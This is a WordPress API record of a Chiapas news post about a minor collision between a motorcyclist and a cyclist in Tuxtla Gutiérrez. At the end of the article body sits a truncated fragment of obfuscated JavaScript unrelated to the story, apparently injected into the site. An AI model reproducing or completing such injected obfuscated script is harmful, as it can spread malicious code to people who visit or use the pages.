{"id":14542,"date":"2024-03-07T02:38:29","date_gmt":"2024-03-07T02:38:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14542"},"modified":"2024-03-07T02:38:30","modified_gmt":"2024-03-07T02:38:30","slug":"ciclista-y-motociclista-colisionan-en-la-carretera-a-emiliano-zapata","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14542","title":{"rendered":"Ciclista y motociclista colisionan en la Carretera a Emiliano Zapata"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"769\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1709779021246-1024x769.jpg\" alt=\"\" class=\"wp-image-14543\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1709779021246-1024x769.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1709779021246-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1709779021246-768x577.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1709779021246.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 6 de marzo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la ma\u00f1ana, un motociclista y un ciclista protagonizaron un choque cuando circulaban sobre la Carretera a Emiliano Zapata, a la altura del Fraccionamiento Real del Bosque de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, todo ocurri\u00f3 cuando el motociclista circulaba en el sentido de Sur a Norte cuando se encontr\u00f3 de manera repentina con el ciclista de nombre Manuel de Jes\u00fas &#8220;N&#8221;, quien iba en sentido contrario.<\/p>\n\n\n\n<p>La peor parte se la llev\u00f3 el ciclista que sali\u00f3 volando del impacto y qued\u00f3 tendido sobre el pavimento.<\/p>\n\n\n\n<p>Afortunadamente el lesionado no present\u00f3 heridas de gravedad por lo que no fue trasladado a un nosocomio.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito para tomar datos del hecho y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 6 de marzo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la ma\u00f1ana, un motociclista y un ciclista protagonizaron un choque cuando circulaban sobre la Carretera a Emiliano Zapata, a la altura del Fraccionamiento Real del Bosque de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, todo ocurri\u00f3 cuando el motociclista circulaba &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14543,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14542","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14542","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14542"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14542\/revisions"}],"predecessor-version":[{"id":14544,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14542\/revisions\/14544"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14543"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14542"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14542"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14542"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}